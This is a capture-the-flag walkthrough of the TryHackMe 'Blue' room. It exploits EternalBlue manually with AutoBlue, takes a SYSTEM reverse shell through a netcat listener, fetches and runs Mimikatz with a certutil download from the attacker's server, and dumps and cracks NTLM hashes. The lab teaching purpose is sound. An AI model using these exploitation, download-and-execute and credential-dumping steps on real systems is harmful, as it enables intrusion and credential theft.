TryHackMe "Blue" Eternalblue Exploitation without Metasploit

Hey everyone! Continuing our push to teach folks to exploit lab machines without relying on Metasploit, I've decided to show you how to exploit Blue (https://tryhackme.com/room/blue). Blue is one of those rites of passage in the capture-the-flag realm: exploiting the EternalBlue vulnerability (MS17-010). We will be doing this manually today with a tool called AutoBlue, which works really well when it works correctly. There won't be any post-exploitation on this machine today as it's a Windows 7 OS; however, you can use what we've covered in the past if you would like to continue past completing the challenge. So without further delay, let's get started!
Scanning
As usual, we get things started with a default Nmap scan, followed by the more thorough -A scan (OS detection, version detection, default scripts and traceroute).

nmap 10.10.211.204

nmap -A 10.10.211.204
We can see that SMB is running on 445 and that the system is running Windows 7. Any time we see Windows 7 and SMB in the same place, we need to strongly consider checking whether the machine is vulnerable to EternalBlue or other vulnerabilities affecting older operating systems. We can do this with Nmap as well: the vuln category includes the smb-vuln-ms17-010 script, which you can also run on its own against port 445 (nmap -p445 --script smb-vuln-ms17-010) if you want to keep the scan short.
nmap --script vuln 10.10.211.204
And as we can see, the machine is vulnerable to EternalBlue (MS17-010). Being as this is a guide on how to manually exploit EternalBlue, we'll need to do some research. So I will see you in the next section.
Enumeration
Now that we know the machine is likely vulnerable to EternalBlue, we can find an exploit. In this case we will use Google to search for a manual EternalBlue exploit, and as you will see we have found one.
Google search on manual eternalblue exploit; Notice the link selected
We will want to visit the above link, which hosts the exploit on GitHub. Below you can see some information about it. When you're done reading and taking notes on how to use the exploit, git clone it to your machine in a working directory of your choice.
Exploit information and clone link
Inside the package is a Python script named eternal_checker.py. We can run this for a final confirmation that the target is vulnerable: it sets up an SMB1 session and sends a TRANS2 SESSION_SETUP request, treating a STATUS_INSUFF_SERVER_RESOURCES reply as the signature of an unpatched host. Here it reports that the target is not patched. After this we can move on to exploitation.
python eternal_checker.py 10.10.211.204 reporting Target is not patched
Exploitation
Per the instructions, we first need to change to the shellcode directory and run the shell_prep.sh script, which assembles the kernel shellcode together with a reverse-shell payload pointed at your listener. Follow the prompts precisely as shown in the image below; the IP and port you give here must match the listener you start next. Getting this wrong will result in the exploit not functioning properly, and it may crash the machine. You may also have to run the exploit a few times before it works as intended (a common EternalBlue issue).
./shell_prep.sh instruction setup
Bottom - nc -nlvp 2246 Listener to System shell; Top - python eternalblue_exploit7.py 10.10.170.114 shellcode/sc_all.bin
We now have a command shell on the machine with SYSTEM-level privileges. The room requires us to grab the NTLM hashes for the users and crack the Jon user's hash, but we can't do that from a bare shell alone. We need a tool like Mimikatz. You can locate it with the locate mimikatz command in a Linux terminal (on Kali it ships in the windows-resources package; pick the build that matches the target's architecture). Copy the .exe to your working directory and start a Python web server to pull it over: python -m SimpleHTTPServer 8080 on Python 2, or python3 -m http.server 8080 on Python 3. We will use certutil.exe this time to fetch the file, as PowerShell is being uncooperative on this older version of Windows.
Right - python -m SimpleHTTPServer 8080 (notice files are pulled after running command in Windows); Left - certutil.exe -urlcache -split -f http://10.11.1.198:8080/mimikatz.exe mimikatz.exe & mimikatz.exe
So the certutil.exe command is a mouthful. What it does is pull the file from our server (-urlcache -split -f), save it as mimikatz.exe, and then run it after the ampersand. Bear in mind that certutil downloads are a well-known living-off-the-land technique and are commonly flagged by EDR; that's fine on a lab box but not something to rely on quietly elsewhere. You'll notice we now have a Mimikatz prompt, which lets us grab the NTLM hashes we need. Because our shell is already running as SYSTEM, lsadump::sam can read the SAM directly without a privilege::debug or token::elevate step first:
lsadump::sam
Now that you have Jon's hash, you can try to recover the plaintext a couple of different ways (NTLM is an unsalted MD4 over the UTF-16LE password, so it cracks quickly). I tend to try an online resource like CrackStation first, and if that doesn't work, brute-force it with Hashcat (-m 1000) or John (--format=NT). In this case CrackStation did the trick.
CrackStation NTLM hash cracked successfully
Finally, we are instructed to locate the three additional flags on the machine and submit their values to the dashboard. I'll leave it to you where exactly they are; however, I have shared the command for searching the system to locate them. Run it from the root of C:\ so the recursive search covers the whole drive, and if the /p paging gets in the way of your netcat shell, swap it for /b to get bare paths only.
dir /s /p *flag*
Final Thoughts
This was a really fun challenge to take on manually, given how easy Metasploit makes it. Manual exploitation is pretty straightforward; however, you may need to be patient and run the exploit several times before it functions properly. Additionally, you could upload an msfvenom payload to the machine to get a more stable shell, as you'll have issues if you accidentally close your initial shell and will need to run the exploit again to regain access.
I hope this walkthrough has been valuable for you as it has been for me. I'll see you again soon!